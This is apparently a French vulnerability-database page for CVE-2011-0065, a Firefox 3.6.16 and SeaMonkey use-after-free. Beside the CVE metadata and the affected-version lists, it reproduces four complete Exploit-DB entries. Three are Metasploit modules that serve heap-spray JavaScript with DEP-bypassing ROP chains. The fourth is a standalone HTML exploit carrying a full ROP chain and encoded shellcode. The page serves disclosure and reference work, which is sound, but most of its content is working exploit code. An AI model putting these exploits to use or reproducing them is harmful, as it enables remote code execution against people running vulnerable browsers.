CVE-2011-0065 : Détail

CVE-2011-0065

96.97%V3
Network
2011-05-07
16h00 +00:00
2017-09-18
10h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Use-after-free vulnerability in Mozilla Firefox before 3.5.19 and 3.6.x before 3.6.17, and SeaMonkey before 2.0.14, allows remote attackers to execute arbitrary code via vectors related to OBJECT's mChannel.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 18377

Date de publication : 2012-01-16 23h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::FF, :ua_minver => "3.6.16", :ua_maxver => "3.6.16", :os_name => OperatingSystems::MAC_OSX, :javascript => true, :rank => NormalRanking, }) def initialize(info = {}) super(update_info(info, 'Name' => 'Mozilla Firefox 3.6.16 mChannel use after free vulnerability', 'Description' => %q{ This module exploits an use after free vulnerability in Mozilla Firefox 3.6.16. An OBJECT Element mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECTs data attribute. (Discovered by regenrecht). Mac OS X version by argp, tested on Mac OS X 10.6.6, 10.6.7 and 10.6.8. }, 'License' => MSF_LICENSE, 'Author' => [ 'regenrecht', # discovery 'Rh0', # windows metasploit module 'argp <argp[at]census-labs.com>' # mac os x target ], 'References' => [ ['CVE', '2011-0065'], ['OSVDB', '72085'], ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=634986'], ['URL', 'http://www.mozilla.org/security/announce/2011/mfsa2011-13.html'] ], 'Payload' => { 'Space' => 1024, }, 'Platform' => 'osx', 'Targets' => [ [ 'Firefox 3.6.16 on Mac OS X (10.6.6, 10.6.7 and 10.6.8)', { 'Arch' => ARCH_X86, 'Fakevtable' => 0x2727, 'Fakefunc' => 0x2727001c, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'May 10 2011' )) end def on_request_uri(cli, request) # Random JavaScript variable names js_element_name = rand_text_alpha(rand(10) + 5) js_obj_addr_name = rand_text_alpha(rand(10) + 5) js_sc_name = rand_text_alpha(rand(10) + 5) js_ret_addr_name = rand_text_alpha(rand(10) + 5) js_chunk_name = rand_text_alpha(rand(10) + 5) js_final_chunk_name = rand_text_alpha(rand(10) + 5) js_block_name = rand_text_alpha(rand(10) + 5) js_array_name = rand_text_alpha(rand(10) + 5) # check for non vulnerable targets agent = request.headers['User-Agent'] if agent !~ /Intel Mac OS X 10\.6/ and agent !~ /Firefox\/3\.6\.16/ print_error("Target not supported: #{agent}") if datastore['VERBOSE'] send_not_found(cli) return end # Re-generate the payload return if ((payload = regenerate_payload(cli).encoded) == nil) payload_buf = '' payload_buf << payload escaped_payload = Rex::Text.to_unescape(payload_buf) # setup the fake memory references my_target = targets[0] # in case we add more targets later fakevtable = Rex::Text.to_unescape([my_target['Fakevtable']].pack('v')) fakefunc = Rex::Text.to_unescape([my_target['Fakefunc']].pack('V*')) exploit_js = <<-JS #{js_element_name} = document.getElementById("d"); #{js_element_name}.QueryInterface(Components.interfaces.nsIChannelEventSink); #{js_element_name}.onChannelRedirect(null, new Object, 0) #{js_obj_addr_name} = unescape("\x00#{fakevtable}"); var #{js_sc_name} = unescape("#{escaped_payload}"); var #{js_ret_addr_name} = unescape("#{fakefunc}"); while(#{js_ret_addr_name}.length < 0x120) { #{js_ret_addr_name} += #{js_ret_addr_name}; } var #{js_chunk_name} = #{js_ret_addr_name}.substring(0, 0x18); #{js_chunk_name} += #{js_sc_name}; #{js_chunk_name} += #{js_ret_addr_name}; var #{js_final_chunk_name} = #{js_chunk_name}.substring(0, 0x10000 / 2); while(#{js_final_chunk_name}.length < 0x800000) { #{js_final_chunk_name} += #{js_final_chunk_name}; } var #{js_block_name} = #{js_final_chunk_name}.substring(0, 0x80000 - #{js_sc_name}.length - 0x24 / 2 - 0x4 / 2 - 0x2 / 2); #{js_array_name} = new Array() for(n = 0; n < 0x220; n++) { #{js_array_name}[n] = #{js_block_name} + #{js_sc_name}; } JS html = <<-HTML <html> <body> <object id="d"><object> <script type="text/javascript"> #{exploit_js} </script> </body> </html> HTML #Remove the extra tabs html = html.gsub(/^\t\t/, '') print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, html, { 'Content-Type' => 'text/html' }) # Handle the payload handler(cli) end end
Exploit Database EDB-ID : 17672

Date de publication : 2011-08-15 22h00 +00:00
Auteur : mr_me
EDB Vérifié : Yes

<html> <body> <applet code="rubik.class" width=140 height=140></applet> <p><b>Mozilla mChannel Object use after free</b><br /> - Found by regenrecht<br /> - MSF exploit by Rh0<br /> - Win 7 fun version by mr_me</p> <!-- Notes: - This exploit requires <= java 6 update 25. - optimized heap spray and still works on mutiple tabs as the spray is large enough to hit the 0x10000000 block. - If you really want the class file you can get it here: http://javaboutique.internet.com/Rubik/rubik.class, but java still loads without it. - Tested on windows 7 ultimate (latest updates). - http://bit.ly/qD4Jkc --> <object id="d"><object> <script type="text/javascript"> function trigger(){ alert('ready?'); fakeobject = document.getElementById("d"); // allocate the object fakeobject.QueryInterface(Components.interfaces.nsIChannelEventSink); // append to the objects available functions fakeobject.onChannelRedirect(null,new Object,0); // free it /* fill the object with a fake vtable reference just use the start of a block for simplicity and use \x00 because it expands to a NULL so that when we have have the CALL DWORD PTR DS:[ECX+18], it will point to 0x10000000 */ fakevtable = unescape("\x00%u1000"); var rop = ""; // 3 instructions to pivot cleanly rop += unescape("%u1033%u6d7f"); // 0x6D7F1033 -> MOV EAX,[ECX] / PUSH EDI / CALL [EAX+4] <jvm.dll> rop += unescape("%u10a7%u6d7f"); // 0x6D7F10A7 -> POP EBP / RETN <jvm.dll> rop += unescape("%u1441%u6d7f"); // 0x6D7F1441 -> XCHG EAX,ESP / RETN <jvm.dll> // generic rop taken from MSVCR71.dll (thanks to corelanc0d3r) rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN rop += unescape("%ua140%u7c37"); // 0x7c37a140 -> Make EAX readable rop += unescape("%u591f%u7c37"); // 0x7c37591f -> PUSH ESP / ... / POP ECX / POP EBP / RETN rop += unescape("%uf004%ubeef"); // 0x41414141 -> EBP (filler) rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN rop += unescape("%ua140%u7c37"); // 0x7c37a140 -> *&VirtualProtect() rop += unescape("%u30ea%u7c35"); // 0x7c3530ea -> MOV EAX,[EAX] / RETN rop += unescape("%u6c0b%u7c34"); // 0x7c346c0b -> Slide, so next gadget would write to correct stack location rop += unescape("%u6069%u7c37"); // 0x7c376069 -> MOV [ECX+1C],EAX / POP EDI / POP ESI / POP EBX / RETN rop += unescape("%uf00d%ubeef"); // 0x41414141 -> EDI (filler) rop += unescape("%uf00d%ubeef"); // 0x41414141 -> will be patched at runtime (VP), then picked up into ESI rop += unescape("%uf00d%ubeef"); // 0x41414141 -> EBX (filler) rop += unescape("%u6402%u7c37"); // 0x7c376402 -> POP EBP / RETN rop += unescape("%u5c30%u7c34"); // 0x7c345c30 -> ptr to 'push esp / ret ' rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN rop += unescape("%udfff%uffff"); // 0xfffffdff -> size 0x00000201 -> ebx, modify if needed rop += unescape("%u1e05%u7c35"); // 0x7c351e05 -> NEG EAX / RETN rop += unescape("%u4901%u7c35"); // 0x7c354901 -> POP EBX / RETN rop += unescape("%uffff%uffff"); // 0xffffffff -> pop value into ebx rop += unescape("%u5255%u7c34"); // 0x7c345255 -> INC EBX / FPATAN / RETN rop += unescape("%u2174%u7c35"); // 0x7c352174 -> ADD EBX,EAX / XOR EAX,EAX / INC EAX / RETN rop += unescape("%ud201%u7c34"); // 0x7c34d201 -> POP ECX / RETN rop += unescape("%ub001%u7c38"); // 0x7c38b001 -> RW pointer (lpOldProtect) (-> ecx) rop += unescape("%ub8d7%u7c34"); // 0x7c34b8d7 -> POP EDI / RETN rop += unescape("%ub8d8%u7c34"); // 0x7c34b8d8 -> ROP NOP (-> edi) rop += unescape("%u4f87%u7c34"); // 0x7c344f87 -> POP EDX / RETN rop += unescape("%uffc0%uffff"); // 0xffffffc0 -> value to negate, target value : 0x00000040, target: edx rop += unescape("%u1eb1%u7c35"); // 0x7c351eb1 -> NEG EDX / RETN rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN rop += unescape("%u9090%u9090"); // 0x90909090 -> NOPS (-> eax) rop += unescape("%u8c81%u7c37"); // 0x7c378c81 -> PUSHAD / ADD AL,0EF / RETN sc = rop; // nice big 'calccode' (0x400 bytes) sc += unescape("%uf869%u0d93%u3578%u7704%u902d%u432c%u249f%uba46%u983c%ub299%ufe13%uf9c0"+ "%u784f%u2f7c%u4fa9%u7a76%ub235%u7027%u2f73%ub937%ud380%u0de3%u157f%u93b5%ubfba%u4291"+ "%ufc03%u3d40%u729f%u9b24%u7e7b%u3814%u8dfd%u2592%u892c%u01e0%uf9d0%u41b1%uf731%u75e1"+ "%ubb3f%u7d79%uf811%u6734%u992d%u4b49%u6690%u71b4%ua847%u094a%u05eb%u4eb3%ud119%u3ae2"+ "%u0cd6%u96be%ub0b8%u4697%u98b7%u1048%ub6d5%u1c04%uf56b%u201d%u74d4%u773c%u727f%u7b7d"+ "%u7e7c%u7571%u9743%u1c49%ubb90%u4e74%u3cb5%ua993%ub09f%u73ba%ud522%u8d4f%u98be%u3304"+ "%u88f5%u43d4%u92b4%u7ab8%ud60a%u1da8%ub14a%uf82a%ub7b2%u2c41%u3b79%u05fd%u85b9%u76e0"+ "%ufc1a%u4b35%u9647%u8134%u24e1%u8366%u48e3%u4214%u870c%uebd2%u3f78%u9bb3%uff1b%uc1c7"+ "%u67e2%u910d%u70b6%u4615%u2d25%u772f%u993d%ubf27%u1240%u37f9%u7a77%u7279%u9167%u2f76"+ "%ubeb5%u15b6%u7d7f%u303f%u40e3%u11b7%u19e0%u39e2%u04fc%ua8ba%u991d%ud518%u41bb%u78bf"+ "%u9834%ub8b4%u270d%u8390%u4ffd%u31b1%u70e1%u4349%u86b3%u9ff5%u331c%ud6f7%u667e%ua93c"+ "%u9b8d%uf687%u46d4%u4293%u7314%u3d35%u257b%u4a97%u37b0%u2496%u4b74%u2c75%u92b9%u2d7c"+ "%u4748%u694e%uebd3%uf829%u08b2%u71f9%u790c%u717a%u227b%u05e2%u3cb8%u9fb6%u7896%uf903"+ "%u217e%ubfd6%u4e91%u3db3%u777c%u0d76%u7372%u1541%ub2ba%u342c%u9048%ud484%ue189%u4f05"+ "%u677f%ubbb9%u4370%u7d74%u1c75%ua92d%u1342%u93f5%u090c%u12e3%u92f8%u662f%u49b0%u8d99"+ "%ub44b%uc688%uebc0%u474a%u2b37%u46fc%u0a9b%u04fd%ue086%u2740%ua8be%u35b5%u3f97%u24b1"+ "%u1498%u25b7%u7c1d%u0b7f%ub1d5%u410c%u1047%u7deb%ue228%u7672%u7e78%u7177%u1b73%ufdd0"+ "%u3bb2%u3ce0%u7515%u4e25%uf52a%u70b9%u3540%u9993%ubf2c%u85b5%u79fc%u3474%u377b%ud26b"+ "%ubed5%u982d%ue33a%u9243%u7a14%ub33d%u9048%ubb8d%u9b24%u2f46%u20b0%uf9d1%ub897%ua866"+ "%ub4b7%ua996%ub642%ue180%u4a27%u1a77%u9fd4%u017e%u18eb%u8cf8%ubad6%u1c7c%u497f%u7467"+ "%u784f%u914b%u3271%u04e0%u0d7a%u1d79%u397b%ue2c1%u7d05%u933f%u70b1%ub324%u3cb8%u6642"+ "%u961c%u9b27%u72bf%ue338%ub53d%u3040%ub4fc%u7646%uf525%u029f%ubad5%u0cf8%u3fa9%u7514"+ "%ubb0d%u23e1%ub9d6%u05d4%u378d%ub243%ub735%u1573%u4798%u2c48%ua84b%ufd41%u4f2d%u1db6"+ "%u9049%uf981%ube04%u3491%u924e%ub097%u2f4a%u9967%u8dbe%u5994%udbe7%ud9da%u2474%u58f4"+ "%uc929%u33b1%u7031%u8312%u04c0%ufd03%ubb9a%u0112%ub24a%uf9dd%ua58b%u1c54%uf7ba%u5503"+ "%uc7ef%u3b40%ua31c%uaf05%uc197%uc081%u6f10%ueff4%u41a1%ua338%uc362%ub9c4%u23b6%u72f4"+ "%u22cb%u6e31%u7624%ue5ea%u6797%ubb9f%u892b%ub04f%uf114%u06ea%u4be0%u56f4%uc759%u4ebe"+ "%u8fd1%u6f1e%ucc36%u2663%u2733%ub917%u7995%u88d8%ud6d9%u25e7%u27d4%u812f%u5207%uf25b"+ "%u65ba%u8998%ue360%u293d%u53e2%uc8e6%u0527%uc66d%u418c%uca29%u8513%uf641%u2898%u7f86"+ "%u0eda%u2402%u2fb8%u8013%u4f6f%u6c43%uf5cf%u9e0f%u8f04%uf44d%u1ddb%ub1e8%u1ddc%u91f3"+ "%u2cb4%u7e78%ub0c2%u3bab%ufb3c%u6df6%ua2d5%u2c62%u54b8%u7259%ud6c5%u0a68%uc632%u0f18"+ "%u407e%u7df0%u25ef%ud2f6%u6c10%ub595%uec82%u5074%u9623%u4188"); // create a string with a ptr to the offset of our rop // used 0x1000001c to accomidate 0x18 + 0x4 (1st rop gadget) var filler = unescape("%u001c%u1000"); while(filler.length < 0x100) {filler += filler;} /* create a string with 0x18 bytes at the start containing ptr's to the rop. This is to account for the vtable offset (0x18) -> 'CALL DWORD PTR DS:[ECX+18]' Then fill with sc + junk */ var chunk = filler.substring(0,0x18/2); chunk += sc; chunk += filler; // create a string of size 64k in memory that contains sc + filler var heapblock = chunk.substring(0,0x10000/2); // keep adding more memory that contains sc + filler to reach 512kB while (heapblock.length<0x80000) {heapblock += heapblock;} /* using a final string of 512kB so that the spray is fast but ensuring accuracy - sub the block header length (0x24) - sub 1/4 of a page for sc (0x400) - sub the string length (0x04) - sub the null byte terminator */ var finalspray = heapblock.substring(0,0x80000 - sc.length - 0x24/2 - 0x4/2 - 0x2/2); // optimised spray, precision can still be reliable even with tabs. // force allocation here of 128 blocks, using only 64MB of memory, speeeeeeed. arrayOfHeapBlocks = new Array() for (n=0;n<0x80;n++){ arrayOfHeapBlocks[n] = finalspray + sc; } } trigger(); </script> </body> </html>
Exploit Database EDB-ID : 17650

Date de publication : 2011-08-09 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: mozilla_mchannel.rb 13507 2011-08-10 05:58:02Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::FF, :ua_minver => "3.6.16", :ua_maxver => "3.6.16", :os_name => OperatingSystems::WINDOWS, :javascript => true, :rank => NormalRanking, }) def initialize(info = {}) super(update_info(info, 'Name' => 'Mozilla Firefox 3.6.16 mChannel use after free vulnerability', 'Description' => %q{ This module exploits an use after free vulnerability in Mozilla Firefox 3.6.16. An OBJECT Element mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECTs data attribute. (Discovered by regenrecht). This module uses heapspray with a minimal ROP chain to bypass DEP on Windows XP SP3 }, 'License' => MSF_LICENSE, 'Author' => [ 'regenrecht', # discovery 'Rh0' # metasploit module ], 'Version' => "$Revision: 13507 $", 'References' => [ ['CVE', '2011-0065'], ['OSVDB', '72085'], ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=634986'], ['URL', 'http://www.mozilla.org/security/announce/2010/mfsa2011-13.html'] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 1024, }, 'Targets' => [ [ 'Firefox 3.6.16 on Windows XP SP3', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'May 10 2011' )) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli).encoded) == nil) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' }) # Handle the payload handler(cli) end def generate_html(payload) # DEP bypass using xul.dll custom_stack = [ 0x1052c871, # mov esp,[ecx] / mov edx,5c86c6ff add [eax],eax / xor eax,eax / pop esi / retN 0x8 0x7c801ad4, # VirtualProtect 0xbeeff00d, 0xbeeff00d, 0x1003876B, # jmp esp 0x0c0c0048, # start address 0x00000400, # size 1024 0x00000040, # Page EXECUTE_READ_WRITE 0x0c0c0c00 # old protection ].pack("V*") payload_buf = '' payload_buf << custom_stack payload_buf << payload escaped_payload = Rex::Text.to_unescape(payload_buf) #Random JavaScript variable names js_element_name = rand_text_alpha(rand(10) + 5) js_obj_addr_name = rand_text_alpha(rand(10) + 5) js_sc_name = rand_text_alpha(rand(10) + 5) js_ret_addr_name = rand_text_alpha(rand(10) + 5) js_chunk_name = rand_text_alpha(rand(10) + 5) js_final_chunk_name = rand_text_alpha(rand(10) + 5) js_block_name = rand_text_alpha(rand(10) + 5) #Reference: adobe_flashplayer_newfunction.rb custom_js = <<-JS #{js_element_name} = document.getElementById("d"); #{js_element_name}.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0); #{js_obj_addr_name} = unescape("\\x0c%u0c0c"); var #{js_sc_name} = unescape("#{escaped_payload}"); var #{js_ret_addr_name} = unescape("%u0024%u0c0c"); while(#{js_ret_addr_name}.length+20+8 < 0x100000) {#{js_ret_addr_name} += #{js_ret_addr_name};} var #{js_chunk_name} = #{js_ret_addr_name}.substring(0,(0x48-0x24)/2); #{js_chunk_name} += #{js_sc_name}; #{js_chunk_name} += #{js_ret_addr_name}; var #{js_final_chunk_name} = #{js_chunk_name}.substring(0,0x10000/2); while (#{js_final_chunk_name}.length<0x800000) {#{js_final_chunk_name} += #{js_final_chunk_name};} var #{js_block_name} = #{js_final_chunk_name}.substring(0,0x80000 - (0x1020-0x08)/2); array = new Array() for (n=0;n<0x1f0;n++){ array[n] = #{js_block_name} + #{js_sc_name}; } #{js_element_name}.data = ""; JS #Remove the extra tabs custom_js = custom_js.gsub(/^\t\t/, '') html = <<-HTML <html> <body> <object id="d"><object> <script type="text/javascript"> #{custom_js} </script> </body> </html> HTML return html end end
Exploit Database EDB-ID : 17612

Date de publication : 2011-08-04 22h00 +00:00
Auteur : Rh0
EDB Vérifié : Yes

require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::FF, :ua_minver => "3.6.16", :ua_maxver => "3.6.16", :os_name => OperatingSystems::WINDOWS, :javascript => true, :rank => NormalRanking, }) def initialize(info = {}) super(update_info(info, 'Name' => 'Mozilla Firefox 3.6.16 mChannel use after free Exploit', 'Description' => %q{ This module exploits an use after free vulnerability in Mozilla Firefox 3.6.16. An OBJECT Element mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECTs data attribute. (Discovered by regenrecht). This module uses heapspray with a minimal ROP chain to bypass DEP on Windows XP SP3 }, 'License' => MSF_LICENSE, 'Author' => [ 'regenrecht', # discovery 'Rh0' # wrote metasploit module ], 'Version' => '0.0', 'References' => [ ['CVE', '2011-0065'], ['OSVDB', '72085'], ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=634986'], ['URL', 'http://www.mozilla.org/security/announce/2011/mfsa2011-13.html'] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "", }, 'Targets' => [ # worked with 100% reliability [ 'Firefox 3.6.16, Windows XP SP3 (VirtualBox 4)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'May 10 2011' )) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli).encoded) == nil) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' }) # Handle the payload handler(cli) end def generate_html(payload) # DEP bypass custom_stack = [ 0x1052c871, # mov esp,[ecx] / mov edx,5c86c6ff add [eax],eax / xor eax,eax / pop esi / retN 0x8 0x7c801ad4, # VirtualProtect 0xbeeff00d, 0xbeeff00d, 0x7c874413, # jmp esp 0x0c0c0048, # start address 0x00000400, # size 1024 0x00000040, # Page EXECUTE_READ_WRITE 0x0c0c0c00 # old protection ].pack("V*") payload_buf = '' payload_buf << custom_stack payload_buf << payload escaped_payload = Rex::Text.to_unescape(payload_buf) custom_js = %Q| e = document.getElementById("d"); e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0) fake_obj_addr = unescape("\\x0c%u0c0c") // taken and modified from adobe_flashplayer_newfunction.rb var sc = unescape("#{escaped_payload}") var ret_addr = unescape("%u0024%u0c0c") while(ret_addr.length+20+8 < 0x100000) {ret_addr += ret_addr} var b = ret_addr.substring(0,(0x48-0x24)/2) b += sc b += ret_addr var next = b.substring(0,0x10000/2) while(next.length<0x800000) {next += next} var again = next.substring(0,0x80000 - (0x1020-0x08)/2) array = new Array() for (n=0;n<0x1f0;n++){ array[n] = again + sc } e.data = "" | return %Q| <html> <body> <object id="d"><object> <script type="text/javascript"> #{custom_js} </script></body></html> | end end

Products Mentioned

Configuraton 0

Mozilla>>Firefox >> Version 3.6

Mozilla>>Firefox >> Version 3.6.2

Mozilla>>Firefox >> Version 3.6.3

Mozilla>>Firefox >> Version 3.6.4

Mozilla>>Firefox >> Version 3.6.6

Mozilla>>Firefox >> Version 3.6.7

Mozilla>>Firefox >> Version 3.6.8

Mozilla>>Firefox >> Version 3.6.9

Mozilla>>Firefox >> Version 3.6.10

Mozilla>>Firefox >> Version 3.6.11

Mozilla>>Firefox >> Version 3.6.12

Mozilla>>Firefox >> Version 3.6.13

Mozilla>>Firefox >> Version 3.6.14

Mozilla>>Firefox >> Version 3.6.15

Mozilla>>Firefox >> Version 3.6.16

Configuraton 0

Mozilla>>Seamonkey >> Version To (including) 2.0.13

Mozilla>>Seamonkey >> Version 1.0

Mozilla>>Seamonkey >> Version 1.0

Mozilla>>Seamonkey >> Version 1.0

Mozilla>>Seamonkey >> Version 1.0.1

Mozilla>>Seamonkey >> Version 1.0.2

Mozilla>>Seamonkey >> Version 1.0.3

Mozilla>>Seamonkey >> Version 1.0.4

Mozilla>>Seamonkey >> Version 1.0.5

Mozilla>>Seamonkey >> Version 1.0.6

Mozilla>>Seamonkey >> Version 1.0.7

Mozilla>>Seamonkey >> Version 1.0.8

Mozilla>>Seamonkey >> Version 1.0.9

Mozilla>>Seamonkey >> Version 1.1

Mozilla>>Seamonkey >> Version 1.1

Mozilla>>Seamonkey >> Version 1.1

Mozilla>>Seamonkey >> Version 1.1.1

Mozilla>>Seamonkey >> Version 1.1.2

Mozilla>>Seamonkey >> Version 1.1.3

Mozilla>>Seamonkey >> Version 1.1.4

Mozilla>>Seamonkey >> Version 1.1.5

Mozilla>>Seamonkey >> Version 1.1.6

Mozilla>>Seamonkey >> Version 1.1.7

Mozilla>>Seamonkey >> Version 1.1.8

Mozilla>>Seamonkey >> Version 1.1.9

Mozilla>>Seamonkey >> Version 1.1.10

Mozilla>>Seamonkey >> Version 1.1.11

Mozilla>>Seamonkey >> Version 1.1.12

Mozilla>>Seamonkey >> Version 1.1.13

Mozilla>>Seamonkey >> Version 1.1.14

Mozilla>>Seamonkey >> Version 1.1.15

Mozilla>>Seamonkey >> Version 1.1.16

Mozilla>>Seamonkey >> Version 1.1.17

Mozilla>>Seamonkey >> Version 1.1.18

Mozilla>>Seamonkey >> Version 1.1.19

Mozilla>>Seamonkey >> Version 1.5.0.8

Mozilla>>Seamonkey >> Version 1.5.0.9

Mozilla>>Seamonkey >> Version 1.5.0.10

Mozilla>>Seamonkey >> Version 2.0

Mozilla>>Seamonkey >> Version 2.0

Mozilla>>Seamonkey >> Version 2.0

Mozilla>>Seamonkey >> Version 2.0

Mozilla>>Seamonkey >> Version 2.0

Mozilla>>Seamonkey >> Version 2.0

Mozilla>>Seamonkey >> Version 2.0

Mozilla>>Seamonkey >> Version 2.0

Mozilla>>Seamonkey >> Version 2.0.1

Mozilla>>Seamonkey >> Version 2.0.2

Mozilla>>Seamonkey >> Version 2.0.3

Mozilla>>Seamonkey >> Version 2.0.4

Mozilla>>Seamonkey >> Version 2.0.5

Mozilla>>Seamonkey >> Version 2.0.6

Mozilla>>Seamonkey >> Version 2.0.7

Mozilla>>Seamonkey >> Version 2.0.8

Mozilla>>Seamonkey >> Version 2.0.9

Mozilla>>Seamonkey >> Version 2.0.10

Mozilla>>Seamonkey >> Version 2.0.11

Mozilla>>Seamonkey >> Version 2.0.12

Configuraton 0

Mozilla>>Firefox >> Version To (including) 3.5.18

Mozilla>>Firefox >> Version 1.0

Mozilla>>Firefox >> Version 1.0

Mozilla>>Firefox >> Version 1.0.1

Mozilla>>Firefox >> Version 1.0.2

Mozilla>>Firefox >> Version 1.0.3

Mozilla>>Firefox >> Version 1.0.4

Mozilla>>Firefox >> Version 1.0.5

Mozilla>>Firefox >> Version 1.0.6

Mozilla>>Firefox >> Version 1.0.7

Mozilla>>Firefox >> Version 1.0.8

Mozilla>>Firefox >> Version 1.5

Mozilla>>Firefox >> Version 1.5

Mozilla>>Firefox >> Version 1.5

Mozilla>>Firefox >> Version 1.5.0.1

Mozilla>>Firefox >> Version 1.5.0.2

Mozilla>>Firefox >> Version 1.5.0.3

Mozilla>>Firefox >> Version 1.5.0.4

Mozilla>>Firefox >> Version 1.5.0.5

Mozilla>>Firefox >> Version 1.5.0.6

Mozilla>>Firefox >> Version 1.5.0.7

Mozilla>>Firefox >> Version 1.5.0.8

Mozilla>>Firefox >> Version 1.5.0.9

Mozilla>>Firefox >> Version 1.5.0.10

Mozilla>>Firefox >> Version 1.5.0.11

Mozilla>>Firefox >> Version 1.5.0.12

Mozilla>>Firefox >> Version 1.5.1

Mozilla>>Firefox >> Version 1.5.2

Mozilla>>Firefox >> Version 1.5.3

Mozilla>>Firefox >> Version 1.5.4

Mozilla>>Firefox >> Version 1.5.5

Mozilla>>Firefox >> Version 1.5.6

Mozilla>>Firefox >> Version 1.5.7

Mozilla>>Firefox >> Version 1.5.8

Mozilla>>Firefox >> Version 2.0

Mozilla>>Firefox >> Version 2.0.0.1

Mozilla>>Firefox >> Version 2.0.0.2

Mozilla>>Firefox >> Version 2.0.0.3

Mozilla>>Firefox >> Version 2.0.0.4

Mozilla>>Firefox >> Version 2.0.0.5

Mozilla>>Firefox >> Version 2.0.0.6

Mozilla>>Firefox >> Version 2.0.0.7

Mozilla>>Firefox >> Version 2.0.0.8

Mozilla>>Firefox >> Version 2.0.0.9

Mozilla>>Firefox >> Version 2.0.0.10

Mozilla>>Firefox >> Version 2.0.0.11

Mozilla>>Firefox >> Version 2.0.0.12

Mozilla>>Firefox >> Version 2.0.0.13

Mozilla>>Firefox >> Version 2.0.0.14

Mozilla>>Firefox >> Version 2.0.0.15

Mozilla>>Firefox >> Version 2.0.0.16

Mozilla>>Firefox >> Version 2.0.0.17

Mozilla>>Firefox >> Version 2.0.0.18

Mozilla>>Firefox >> Version 2.0.0.19

Mozilla>>Firefox >> Version 2.0.0.20

Mozilla>>Firefox >> Version 3.0

Mozilla>>Firefox >> Version 3.0.1

Mozilla>>Firefox >> Version 3.0.2

Mozilla>>Firefox >> Version 3.0.3

Mozilla>>Firefox >> Version 3.0.4

Mozilla>>Firefox >> Version 3.0.5

Mozilla>>Firefox >> Version 3.0.6

Mozilla>>Firefox >> Version 3.0.7

Mozilla>>Firefox >> Version 3.0.8

Mozilla>>Firefox >> Version 3.0.9

Mozilla>>Firefox >> Version 3.0.10

Mozilla>>Firefox >> Version 3.0.11

Mozilla>>Firefox >> Version 3.0.12

Mozilla>>Firefox >> Version 3.0.13

Mozilla>>Firefox >> Version 3.0.14

Mozilla>>Firefox >> Version 3.0.15

Mozilla>>Firefox >> Version 3.0.16

Mozilla>>Firefox >> Version 3.0.17

Mozilla>>Firefox >> Version 3.5

Mozilla>>Firefox >> Version 3.5.1

Mozilla>>Firefox >> Version 3.5.2

Mozilla>>Firefox >> Version 3.5.3

